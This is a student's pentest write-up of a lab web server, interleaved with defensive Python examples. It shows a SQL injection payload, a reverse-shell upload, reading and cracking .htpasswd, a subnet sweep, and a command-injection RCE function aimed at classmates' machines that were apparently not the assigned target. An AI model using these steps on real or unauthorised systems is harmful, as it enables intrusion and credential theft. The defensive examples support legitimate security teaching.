Simple web server pentest
During my last year at uni, we took a class on security. One of the assessments was to take control of a machine, some kind of KOTH minus the competition. We worked in pairs and every pair had its own machine to take over.
Here is a succinct breakdown of how I achieved that, plus a little bonus at the end.
I always start by scanning the machine to see what's up.
Using nmap: nmap -Pn 192.168.xxx.xxx
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp closed http
443/tcp closed https
5432/tcp closed postgresql
8080/tcp open http Apache httpd 2.2.16 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So there is a web server! Let's crack it open. We use gobuster to figure out where the endpoints are:
gobuster -u http://192.168.xxx.xxx:8080 -w /usr/share/dirbuster-basic.txt
We poked around a bit and stumbled upon a very promising URL...
Manual SQL injection
Since we figured out we could inject some SQL on /blog.php?id=<sql>, we can start messing with it.
Figuring out the MySQL version
/blog.php?id=0 and 1=2 union <your request> --
We craft the request to match the number of columns in the original query:
select 1, 1, @@version as 'foo', 1, 1, 1; --
10.2.11-MariaDB-10.2.11 maria~jessie
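The reason this works is that blog.php pastes the raw ?id= value into the SQL text. Below is an added example (not code from the original post or from the assignment's application) showing that pattern beside the parameterized form that fixes it. It uses an in-memory sqlite3 database as a stand-in for MariaDB, so the version function is sqlite_version() instead of @@version; the posts table and its single row are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the blog database (sqlite3 here, so
    the version function is sqlite_version() rather than MariaDB's @@version)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO posts VALUES (1, 'Hello', 'first post')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, raw_id):
    # How blog.php evidently behaves: the query-string value is concatenated
    # into the statement, so the engine parses attacker-controlled text as SQL.
    return conn.execute(f"SELECT id, title, body FROM posts WHERE id = {raw_id}").fetchall()


def hardened_lookup(conn, raw_id):
    # Two independent controls: the value must parse as an integer, and it is
    # bound as a parameter, so the driver never lets it alter the statement.
    try:
        post_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, title, body FROM posts WHERE id = ?", (post_id,)
    ).fetchall()


def run_demo():
    """Feed the same union payload to both lookups.

    Returns (rows from the vulnerable path, rows from the hardened path,
    the engine's real version string) so the two behaviours can be compared.
    """
    payload = "0 and 1=2 union select 1, sqlite_version(), 1 --"
    conn = make_db()
    return (
        vulnerable_lookup(conn, payload),
        hardened_lookup(conn, payload),
        sqlite3.sqlite_version,
    )


if __name__ == "__main__":
    vulnerable_rows, hardened_rows, version = run_demo()
    print("vulnerable:", vulnerable_rows)   # the engine version leaks out as a "post"
    print("hardened:  ", hardened_rows)     # empty: the payload is not a valid id
    print("engine:    ", version)
```

The hardened path rejects the payload before it ever reaches the database; even without the int() check, the bound parameter would be compared as a value rather than parsed as SQL, which is the property that makes prepared statements the standard fix.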
After having some fun with the SQL injection, we went further and discovered we could upload files. After realizing we could trick the server into thinking a PHP file was in fact an image, and figuring out where the file was stored, we were all set to get a reverse shell on this server.
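The upload form trusted the client's idea of what the file was. As an added example (not the assignment's upload.php and not code from the original post), here is the validation an upload handler should do before storing anything: a final-extension allowlist, a check of the file signature against the claimed type, and a server-chosen file name. The MAGIC table and the sample files are constructed for the example.

```python
import hashlib
import os

# File signatures for the image types the form is meant to accept
# (constructed allowlist for this example).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def validate_upload(filename, content):
    """Return the name to store the file under, or None to reject it.

    The client-supplied name and Content-Type are untrusted, so the decision
    rests on the final extension, the file signature, and a server-chosen name.
    """
    base = os.path.basename(filename)      # drop any directory component
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:    # no extension, or a double extension like x.php.png
        return None
    ext = parts[1]
    if ext not in MAGIC:                   # allowlist of image types, never a denylist of script types
        return None
    if not content.startswith(MAGIC[ext]): # the bytes must match the type the name claims
        return None
    if b"<?php" in content or b"<?=" in content:
        # Cheap check for image/script polyglots. Not sufficient on its own:
        # the real control is that the upload directory is never executed.
        return None
    # Server-generated name, so the uploader never chooses the path or extension.
    digest = hashlib.sha256(content).hexdigest()[:16]
    return f"{digest}.{ext}"


def sample_files():
    """Constructed uploads: a tiny PNG header and a script-bearing file."""
    png = MAGIC["png"] + b"\x00" * 32
    script = b"<?php echo 1; ?>"
    return png, script


if __name__ == "__main__":
    png, script = sample_files()
    for name, data in [("avatar.png", png), ("reverseshell.php", script),
                       ("shell.php.png", png), ("shell.png", script),
                       ("poly.png", png + script)]:
        print(f"{name:20} -> {validate_upload(name, data)}")
```

Even with every check above, the directory the files land in must be configured so the web server serves them as static content and never hands them to the PHP interpreter; the validation reduces the attack surface, the no-execute storage removes it.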
Opening a reverse shell
- Start netcat on your computer:
netcat -nvlp PORT
- Start your reverseshell.php on the victim by browsing to:
/upload/reverseshell.php
- Stabilize the shell:
SHELL=/bin/bash script -q /dev/null
export TERM=xterm
Bruteforcing .htaccess password
Using our reverse shell:
cat /var/www/admin/.htpasswd
admin:$apr1$NPiDXOoh$H9hRCiWDVKaikHYjxxxx
We then run hashcat (mode 1600 is Apache's $apr1$ MD5 format):
hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
Going further
There are other students doing the same assignment. Let's figure out the IPs of their machines:
i=0; while [ $i -le 254 ]; do echo "192.168.237.$i"; ping 192.168.237.$i -c 1 -W 0.5 | grep "1 received"; ((i++)); done;
Some of these machines are not related to the assignment. Let's skip them.
Finding machines with /upload:
i=132;
rm /tmp/ip.txt;
while [ $i -le 158 ];
do
curl -s 192.168.237.$i:8080/upload \
--connect-timeout 1 | grep 301 > /dev/null && echo "192.168.237.$i" >> /tmp/ip.txt;
((i++));
done;
cat /tmp/ip.txt;
echo "$(cat /tmp/ip.txt | wc -l)/27";
Getting a quick RCE on these machines (tools.php passes the "ip" form field to a shell unchecked, so a command can be chained onto it):
function badrce() {
ip="$1";
cmd="$2";
curl -s "http://$ip:8080/tools.php" -X POST \
-H 'Referer: http://192.168.237.152:8080/tools.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Connection: keep-alive' \
--data-raw "ip=192.168.237.100 >/dev/null;$cmd&submit=Scan!" > /tmp/file.html;
# keep only what the page printed inside its <pre> block
sed -Ez 's/.*<pre>(.*)<\/pre>.*/\1/' /tmp/file.html
}
# usage: badrce "ip" "command"
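What makes tools.php exploitable is that the "ip" field goes through a shell. As an added example (not the assignment's tools.php and not code from the original post), here is what the same "ping this address" feature looks like when the field is validated as an address literal and the scanner is started without a shell; the argv list and the ping flags are constructed for the example.

```python
import ipaddress
import subprocess


def build_scan_command(raw_ip):
    """Turn the untrusted form field into an argv list for the scanner.

    ipaddress.ip_address() accepts only a bare IPv4/IPv6 literal and raises
    ValueError for anything else, so a value with ';', '>', '&' or '|' glued
    onto an address is rejected before any process starts.
    """
    ip = ipaddress.ip_address(raw_ip.strip())
    # A list of arguments goes straight to execve: no shell parses it, so
    # metacharacters would be plain characters even if one slipped through.
    return ["ping", "-c", "1", "-W", "1", str(ip)]


def is_valid_target(raw_ip):
    """True when the field is a single address literal and nothing else."""
    try:
        build_scan_command(raw_ip)
        return True
    except ValueError:
        return False


def scan(raw_ip):
    """Run the ping, or refuse without touching the OS for bad input."""
    if not is_valid_target(raw_ip):
        return "invalid address"
    result = subprocess.run(
        build_scan_command(raw_ip), capture_output=True, text=True, timeout=10
    )
    return result.stdout


if __name__ == "__main__":
    for field in ["192.168.237.100", "192.168.237.100 >/dev/null;id", "2001:db8::1"]:
        print(f"{field!r:40} valid={is_valid_target(field)}")
```

Validation and the no-shell invocation are independent defences: the allowlist check stops the request at the edge, and passing argv directly to the kernel means a future bug in the check still cannot turn the field into a command line.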